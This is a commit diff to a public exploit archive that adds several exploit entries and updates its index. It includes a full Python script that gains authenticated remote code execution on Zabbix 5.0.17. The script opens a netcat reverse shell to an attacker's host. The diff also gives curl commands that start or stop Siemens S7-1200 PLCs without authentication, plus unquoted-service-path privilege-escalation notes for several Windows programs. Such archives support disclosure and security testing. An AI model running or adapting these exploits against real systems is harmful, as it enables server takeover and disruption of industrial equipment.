DB: 2022-03-11

8 changes to exploits/shellcodes Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path McAfee(R) Safe Connect VPN - Unquoted Service Path Elevation Of Privilege BattlEye 0.9 - 'BEService' Unquoted Service Path WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path Siemens S7-1200 - Unauthenticated Start/Stop Command Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
2022-03-11 05:01:39 +00:00 · 2022-03-11 05:01:39 +00:00 · 88a02fb8d8
commit 88a02fb8d8
parent 280b8f430a
9 changed files with 311 additions and 1 deletions
--- a/exploits/hardware/remote/50793.txt
+++ b/exploits/hardware/remote/50793.txt
@ -4,7 +4,6 @@
 # Vendor Homepage: https://www.wago.com
 # Version: Firmware version 03.05.10(17)
 # Tested on: PopOS! [Linux](Firefox)
-# CVE : CVE-2021-46388

 ========================================
 = The ordinary user privilege request:
--- a/exploits/hardware/remote/50820.txt
+++ b/exploits/hardware/remote/50820.txt
@ -0,0 +1,16 @@
+# Exploit Title: Unauthenticated Siemens S7-1200 CPU Start/Stop Command
+# Date: 09/03/2022
+# Exploit Author: RoseSecurity
+# Vendor Homepage: https://www.siemens.com/global/en.html
+# Version: V4.5 and below
+# Tested on: Siemens S7-1200 (CPU: 1215C)
+
+# IP == PLC IP address
+
+# Start Command
+
+curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Start' \ 'http://<IP>/CPUCommands'
+
+# Stop Command
+
+curl -i -s -k -X $'POST' \ -H $'Host: <IP>' -H $'Content-Length: 19' -H $'Cache-Control:max-age=0' -H $'Upgrade-Insecure-Requests: 1' -H $'Origin: http://<IP>' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: Mozilla/5.0. (Windows NT 10.0; Win64; x64) AppleWebkit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' -H $'Accept: text/html, application /xhmtl+xml, application/xml; q=0.9,image/avif, image/webp, image/apng,*/ - *; q=0.8, application/signed-exchange; v=b3; q=0.9' -H $'Referer: http://<IP>/Portal/Portal.mwsl?PriNav=Start' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US, en; q=0.9' -H $'Connection: close' \ -b $'siemens_automation_no_intro=TRUE' \ --data-binary $'Run=1&PriNav=Stop' \ 'http://<IP>/CPUCommands'
--- a/exploits/php/webapps/50816.py
+++ b/exploits/php/webapps/50816.py
@ -0,0 +1,151 @@
+# Exploit Title: Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)
+# Date: 9/3/2022
+# Exploit Author: Hussien Misbah
+# Vendor Homepage: https://www.zabbix.com/
+# Software Link: https://www.zabbix.com/rn/rn5.0.17
+# Version: 5.0.17
+# Tested on: Linux
+# Reference: https://github.com/HussienMisbah/tools/tree/master/Zabbix_exploit
+
+#!/usr/bin/python3
+# note : this is blind RCE so don't expect to see results on the site
+# this exploit is tested against Zabbix 5.0.17 only
+
+import sys
+import requests
+import re
+import random
+import string
+import colorama
+from colorama import Fore
+
+
+print(Fore.YELLOW+"[*] this exploit is tested against Zabbix 5.0.17 only")
+print(Fore.YELLOW+"[*] can reach the author @ https://hussienmisbah.github.io/")
+
+
+def item_name() :
+    letters = string.ascii_letters
+    item =  ''.join(random.choice(letters) for i in range(20))
+    return item
+
+if len(sys.argv) != 6 :
+    print(Fore.RED +"[!] usage : ./expoit.py <target url>  <username> <password> <attacker ip> <attacker port>")
+    sys.exit(-1)
+
+url  = sys.argv[1]
+username =sys.argv[2]
+password = sys.argv[3]
+host = sys.argv[4]
+port = sys.argv[5]
+
+
+s = requests.Session()
+
+
+headers ={
+"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
+}
+
+data = {
+"request":"hosts.php",
+"name"  : username ,
+"password" : password ,
+"autologin" :"1" ,
+"enter":"Sign+in"
+}
+
+
+proxies = {
+   'http': 'http://127.0.0.1:8080'
+}
+
+
+r = s.post(url+"/index.php",data=data)  #proxies=proxies)
+
+if "Sign out" not in r.text :
+    print(Fore.RED +"[!] Authentication failed")
+    sys.exit(-1)
+if "Zabbix 5.0.17" not in r.text :
+    print(Fore.RED +"[!] This is not Zabbix 5.0.17")
+    sys.exit(-1)
+
+if "filter_hostids%5B0%5D=" in r.text :
+    try :
+        x = re.search('filter_hostids%5B0%5D=(.*?)"', r.text)
+        hostId = x.group(1)
+    except :
+        print(Fore.RED +"[!] Exploit failed to resolve HostID")
+        print(Fore.BLUE +"[?] you can find it under /items then add item")
+        sys.exit(-1)
+else :
+    print(Fore.RED +"[!] Exploit failed to resolve HostID")
+    print(Fore.BLUE +"[?] you can find HostID under /items then add item")
+    sys.exit(-1)
+
+
+sid= re.search('<meta name="csrf-token" content="(.*)"/>',r.text).group(1) # hidden_csrf_token
+
+
+command=f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {host} {port}  >/tmp/f"
+
+payload = f"system.run[{command},nowait]"
+Random_name = item_name()
+data2 ={
+
+"sid":sid,"form_refresh":"1","form":"create","hostid":hostId,"selectedInterfaceId":"0","name":Random_name,"type":"0","key":payload,"url":"","query_fields[name][1]":"","query_fields[value][1]":"","timeout":"3s","post_type":"0","posts":"","headers[name][1]":"","headers[value][1]":"","status_codes":"200","follow_redirects":"1","retrieve_mode":"0","http_proxy":"","http_username":"","http_password":"","ssl_cert_file":"","ssl_key_file":"","ssl_key_password":"","interfaceid":"1","params_es":"","params_ap":"","params_f":"","value_type":"3","units":"","delay":"1m","delay_flex[0][type]":"0","delay_flex[0][delay]":"","delay_flex[0][schedule]":"","delay_flex[0][period]":"","history_mode":"1","history":"90d","trends_mode":"1","trends":"365d","valuemapid":"0","new_application":"","applications[]":"0","inventory_link":"0","description":"","status":"0","add":"Add"
+}
+
+r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"} )
+
+
+no_pages= r2.text.count("?page=")
+
+#################################################[Searching in all pages for the uploaded item]#################################################
+page = 1
+flag=False
+while page <= no_pages :
+    r_page=s.get(url+f"/items.php?page={page}" ,headers=headers )
+    if  Random_name in r_page.text :
+        print(Fore.GREEN+"[+] the payload has been Uploaded Successfully")
+        x2 = re.search(rf"(\d+)[^\d]>{Random_name}",r_page.text)
+        try :
+            itemId=x2.group(1)
+        except :
+            pass
+
+        print(Fore.GREEN+f"[+] you should find it at {url}/items.php?form=update&hostid={hostId}&itemid={itemId}")
+        flag=True
+        break
+
+    else :
+        page +=1
+
+if flag==False :
+        print(Fore.BLUE +"[?] do you know you can't upload same key twice ?")
+        print(Fore.BLUE +"[?] maybe it is already uploaded so set the listener and wait 1m")
+        print(Fore.BLUE +"[*] change the port and try again")
+        sys.exit(-1)
+
+#################################################[Executing the item]#################################################
+
+
+data2["form"] ="update"
+data2["selectedInterfaceId"] = "1"
+data2["check_now"]="Execute+now"
+data2.pop("add",None)
+data2["itemid"]=itemId,
+
+print(Fore.GREEN+f"[+] set the listener at {port} please...")
+
+r2 =s.post(url+"/items.php" ,data=data2,headers=headers,cookies={"tab":"0"}) # ,proxies=proxies )
+
+print(Fore.BLUE+ "[?] note : it takes up to +1 min so be patient :)")
+answer =input(Fore.BLUE+"[+] got a shell ? [y]es/[N]o: ")
+
+if "y" in answer.lower() :
+    print(Fore.GREEN+"Nice !")
+else :
+    print(Fore.RED+"[!] if you find out why please contact me ")
+
+sys.exit(0)
--- a/exploits/windows/local/50814.txt
+++ b/exploits/windows/local/50814.txt
@ -0,0 +1,29 @@
+# Exploit Title: McAfee® Safe Connect VPN - Unquoted Service Path Elevation Of Privilege
+# Date: 09/03/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.mcafee.com/
+# Software Link: https://www.mcafee.com/en-us/vpn/mcafee-safe-connect.html
+# Version: 2.13
+# Tested: Windows 10 x64
+# Contact: https://twitter.com/dmaral3noz
+
+C:\Users\saudh>sc qc SafeConnectService
+
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SafeConnectService
+
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\McAfee\McAfee Safe Connect\SafeConnect.ServiceHost.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : McAfee Safe Connect Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
--- a/exploits/windows/local/50815.txt
+++ b/exploits/windows/local/50815.txt
@ -0,0 +1,29 @@
+# Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path
+# Date: 09/03/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.battleye.com/
+# Software Link: https://www.battleye.com/downloads/
+# Version: 0.94
+# Tested: Windows 10 Pro
+# Contact: https://twitter.com/dmaral3noz
+
+
+C:\Users\saudh>sc qc BEService
+
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: BEService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Common Files\BattlEye\BEService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : BattlEye Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
--- a/exploits/windows/local/50817.txt
+++ b/exploits/windows/local/50817.txt
@ -0,0 +1,31 @@
+# Exploit Title: Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path
+# Date: 09/03/2022
+# Exploit Author: Saud Alenazi
+# Vendor Homepage: https://www.sony.com/
+# Software Link: https://support.d-imaging.sony.co.jp/www/disoft/int/download/playmemories-home/win/en/index.html
+# Version: 6.0
+# Tested: Windows 10 Pro
+# Contact: https://twitter.com/dmaral3noz
+
+
+C:\Users\saudh>sc qc PMBDeviceInfoProvider
+
+[SC] QueryServiceConfig SUCCESS
+
+
+SERVICE_NAME: PMBDeviceInfoProvider
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : PMBDeviceInfoProvider
+        DEPENDENCIES       : RPCSS
+        SERVICE_START_NAME : LocalSystem
+
+
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
--- a/exploits/windows/local/50818.txt
+++ b/exploits/windows/local/50818.txt
@ -0,0 +1,24 @@
+# Exploit Title: WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Exploit Date: 2022-03-09
+# Vendor : ilwebmaster21
+# Version : WOW21_Service 5.0.1.9
+# Vendor Homepage :  https://wow21.life/
+# Tested on OS: Windows 10 Pro x64
+
+#PoC :
+==============
+
+C:\>sc qc WOW21_Service
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: WOW21_Service
+        TIPO                      : 10  WIN32_OWN_PROCESS
+        TIPO_AVVIO                : 2   AUTO_START
+        CONTROLLO_ERRORE          : 1   NORMAL
+        NOME_PERCORSO_BINARIO     : C:\Program Files\WOW21\WOW21_Service.exe
+        GRUPPO_ORDINE_CARICAMENTO :
+        TAG                       : 0
+        NOME_VISUALIZZATO         : WOW21_Service
+        DIPENDENZE                :
+        SERVICE_START_NAME : LocalSystem
--- a/exploits/windows/local/50819.txt
+++ b/exploits/windows/local/50819.txt
@ -0,0 +1,24 @@
+# Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Exploit Date: 2022-03-09
+# Vendor : David Xanatos
+# Version : SbieSvc 5.50.2
+# Vendor Homepage :  https://sandboxie-plus.com/
+# Tested on OS: Windows 10 Pro x64
+
+#PoC :
+==============
+
+C:\>sc qc SbieSvc
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: SbieSvc
+        TIPO                      : 10  WIN32_OWN_PROCESS
+        TIPO_AVVIO                : 2   AUTO_START
+        CONTROLLO_ERRORE          : 1   NORMAL
+        NOME_PERCORSO_BINARIO     : C:\Program Files\Sandboxie-Plus\SbieSvc.exe
+        GRUPPO_ORDINE_CARICAMENTO : UIGroup
+        TAG                       : 0
+        NOME_VISUALIZZATO         : Sandboxie Service
+        DIPENDENZE                :
+        SERVICE_START_NAME : LocalSystem
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11457,6 +11457,7 @@ id,file,description,date,author,type,platform,port
 50789,exploits/windows/local/50789.py,"Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows,
 50790,exploits/windows/local/50790.py,"Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC)",1970-01-01,"Luis Martínez",local,windows,
 50791,exploits/windows/local/50791.txt,"Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path",1970-01-01,"Luis Martínez",local,windows,
+50817,exploits/windows/local/50817.txt,"Sony playmemories home - 'PMBDeviceInfoProvider' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 50804,exploits/windows/local/50804.txt,"Private Internet Access 3.3 - 'pia-service' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
 50805,exploits/windows/local/50805.txt,"Cloudflare WARP 1.4 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
 50806,exploits/windows/local/50806.txt,"Malwarebytes 4.5 - Unquoted Service Path",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
@ -11466,6 +11467,10 @@ id,file,description,date,author,type,platform,port
 50811,exploits/windows/local/50811.py,"Audio Conversion Wizard v2.01 - Buffer Overflow",1970-01-01,"Hejap Zairy Al-Sharif",local,windows,
 50812,exploits/windows/local/50812.cs,"Printix Client 1.3.1106.0 - Privilege Escalation",1970-01-01,"Logan Latvala",local,windows,
 50813,exploits/windows/local/50813.txt,"Wondershare Dr.Fone 12.0.18 - 'Wondershare InstallAssist' Unquoted Service Path",1970-01-01,"Mohamed Alzhrani",local,windows,
+50814,exploits/windows/local/50814.txt,"McAfee(R) Safe Connect VPN - Unquoted Service Path Elevation Of Privilege",1970-01-01,"Saud Alenazi",local,windows,
+50815,exploits/windows/local/50815.txt,"BattlEye 0.9 - 'BEService' Unquoted Service Path",1970-01-01,"Saud Alenazi",local,windows,
+50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
+50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18641,6 +18646,7 @@ id,file,description,date,author,type,platform,port
 50793,exploits/hardware/remote/50793.txt,"WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation",1970-01-01,"Momen Eldawakhly",remote,hardware,
 50796,exploits/windows/remote/50796.html,"Prowise Reflect v1.0.9 - Remote Keystroke Injection",1970-01-01,"Rik Lutz",remote,windows,
 50798,exploits/windows/remote/50798.cs,"Printix Client 1.3.1106.0 - Remote Code Execution (RCE)",1970-01-01,"Logan Latvala",remote,windows,
+50820,exploits/hardware/remote/50820.txt,"Siemens S7-1200 - Unauthenticated Start/Stop Command",1970-01-01,RoseSecurity,remote,hardware,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44883,3 +44889,4 @@ id,file,description,date,author,type,platform,port
 50802,exploits/php/webapps/50802.py,"Attendance and Payroll System v1.0 - SQLi Authentication Bypass",1970-01-01,pr0z,webapps,php,
 50803,exploits/multiple/webapps/50803.py,"Hasura GraphQL 2.2.0 - Information Disclosure",1970-01-01,"Dolev Farhi",webapps,multiple,
 50809,exploits/linux/webapps/50809.py,"Webmin 1.984 - Remote Code Execution (Authenticated)",1970-01-01,faisalfs10x,webapps,linux,
+50816,exploits/php/webapps/50816.py,"Zabbix 5.0.17 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Hussien Misbah",webapps,php,